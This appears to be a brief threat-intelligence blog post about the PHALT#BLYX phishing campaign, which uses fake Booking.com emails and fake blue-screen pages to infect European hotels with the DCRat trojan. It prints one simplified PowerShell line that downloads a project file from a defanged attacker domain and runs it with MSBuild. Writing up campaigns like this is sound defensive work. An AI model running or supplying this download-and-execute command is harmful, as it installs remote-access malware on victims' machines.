PHALT#BLYX Campaign Targets European Hotels with DCRat Malware

PHALT#BLYX Campaign Targets European Hotels with DCRat Malware

A new phishing campaign, dubbed PHALT#BLYX, is targeting European hotels using fake Booking.com emails that redirect victims to fake Blue Screen of Death (BSoD) pages, ultimately delivering the DCRat remote access trojan. The campaign was first detected in late December 2025, demonstrating a sophisticated, multi-stage attack chain.

Why This Matters

Ideal security models assume users are cautious and systems are patched, but real-world attacks exploit human error and vulnerabilities in common software. This campaign highlights the significant financial and reputational damage that can result from successful phishing attacks – a single hotel breach can expose guest data and disrupt operations, potentially costing tens of thousands of dollars in remediation and fines.

Key Insights

• ClickFix lures: Attackers are increasingly using fake error messages (like BSoDs) to trick users into executing malicious code.
• Living off the Land (LotL): The campaign leverages legitimate system binaries like MSBuild.exe to evade detection and establish persistence.
• DCRat (DarkCrystal RAT): A readily available, .NET-based RAT with a plugin architecture used for data theft and remote control.

Working Example

# Example PowerShell command used in the attack (simplified)
Invoke-WebRequest -Uri "2fa-bns[.]com/v.proj" -OutFile "v.proj"
MSBuild.exe v.proj

Practical Applications

• Use Case: Hotels are targeted due to the potential for accessing guest data (credit card numbers, personal information) and disrupting operations.
• Pitfall: Relying solely on signature-based antivirus solutions is insufficient; behavioral analysis and endpoint detection and response (EDR) are crucial for detecting LotL techniques.

References:

• https://thehackernews.com/2026/01/fake-booking-emails-redirect-hotel.html